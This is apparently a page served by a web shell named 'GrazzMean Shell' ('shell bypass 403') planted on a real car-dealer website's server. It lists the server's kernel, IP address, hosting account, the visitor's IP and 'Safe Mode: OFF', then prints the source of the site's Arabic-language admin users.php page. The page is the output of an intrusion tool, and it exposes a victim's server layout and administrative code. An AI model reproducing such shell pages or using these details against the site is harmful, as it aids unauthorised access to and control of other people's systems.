shell bypass 403

GrazzMean Shell

: /var/www/vhosts/m-auto.co/httpdocs/admin/ [ drwxr-xr-x ]
Uname: Linux serv.m-auto.co 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
Software: nginx/1.28.2
PHP version: 8.1.34 [ PHP INFO ] PHP os: Linux
Server Ip: 41.215.243.19
Your Ip: 216.73.216.151
User: m-auto.co_vxasg6smqe (10000) | Group: psacln (1003)
Safe Mode: OFF
Disable Function:
opcache_get_status,mail

name : users.php
<?php
include 'includes/header.php';
require_permission('users_view');

// Fetch all users
$users_result = $conn->query("SELECT id, username, email FROM users ORDER BY id ASC");
?>

<div class="container-fluid">
    <div class="d-sm-flex align-items-center justify-content-between mb-4">
        <h1 class="h3 mb-0 text-gray-800">إدارة المستخدمين</h1>
        <?php if (has_permission('users_add')): ?>
        <a href="user_form.php" class="btn btn-primary btn-icon-split">
            <span class="icon text-white-50">
                <i class="fas fa-plus"></i>
            </span>
            <span class="text">إضافة مستخدم جديد</span>
        </a>
        <?php else: ?>
        <div class="alert alert-warning">
            ليس لديك صلاحية لإضافة مستخدمين جدد
        </div>
        <?php endif; ?>
    </div>

    <?php if (isset($_GET['success'])): ?>
        <div class="alert alert-success alert-dismissible fade show" role="alert">
            تم حفظ البيانات بنجاح!
            <button type="button" class="btn-close" data-bs-dismiss="alert"></button>
        </div>
    <?php endif; ?>

    <div class="card shadow mb-4">
        <div class="card-header py-3">
            <h6 class="m-0 font-weight-bold text-primary">قائمة المستخدمين</h6>
        </div>
        <div class="card-body">
            <div class="table-responsive">
                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                    <thead>
                        <tr>
                            <th>المعرف</th>
                            <th>اسم المستخدم</th>
                            <th>البريد الإلكتروني</th>
                            <th>نوع المستخدم</th>
                            <th>الإجراءات</th>
                        </tr>
                    </thead>
                    <tbody>
                        <?php while($user = $users_result->fetch_assoc()): ?>
                        <tr>
                            <td><?php echo $user['id']; ?></td>
                            <td><?php echo htmlspecialchars($user['username']); ?></td>
                            <td><?php echo htmlspecialchars($user['email'] ?? 'غير محدد'); ?></td>
                            <td>
                                <?php if ($user['id'] == 1): ?>
                                    <span class="badge bg-success">مدير عام</span>
                                <?php else: ?>
                                    <?php
                                    // Check if user has any permissions
                                    $perm_check = $conn->query("SELECT COUNT(*) as perm_count FROM user_permissions WHERE user_id = " . $user['id']);
                                    $perm_result = $perm_check->fetch_assoc();
                                    if ($perm_result['perm_count'] > 0): ?>
                                        <span class="badge bg-primary">مستخدم مخول</span>
                                    <?php else: ?>
                                        <span class="badge bg-secondary">مستخدم عادي</span>
                                    <?php endif; ?>
                                <?php endif; ?>
                            </td>
                            <td>
                                <a href="user_form.php?id=<?php echo $user['id']; ?>" class="btn btn-info btn-sm">
                                    <i class="fas fa-edit"></i> تعديل
                                </a>
                                <?php // Prevent deleting the user with ID 1 (the main admin) ?>
                                <?php if ($user['id'] != 1 && $_SESSION['user_id'] != $user['id']): ?>
                                <a href="user_delete.php?id=<?php echo $user['id']; ?>" class="btn btn-danger btn-sm" onclick="return confirm('هل أنت متأكد من رغبتك في حذف هذا المستخدم؟');">
                                    <i class="fas fa-trash"></i> حذف
                                </a>
                                <?php endif; ?>
                            </td>
                        </tr>
                        <?php endwhile; ?>
                    </tbody>
                </table>
            </div>
        </div>
    </div>
</div>

<?php
include 'includes/footer.php'; 
?>
© 2026 GrazzMean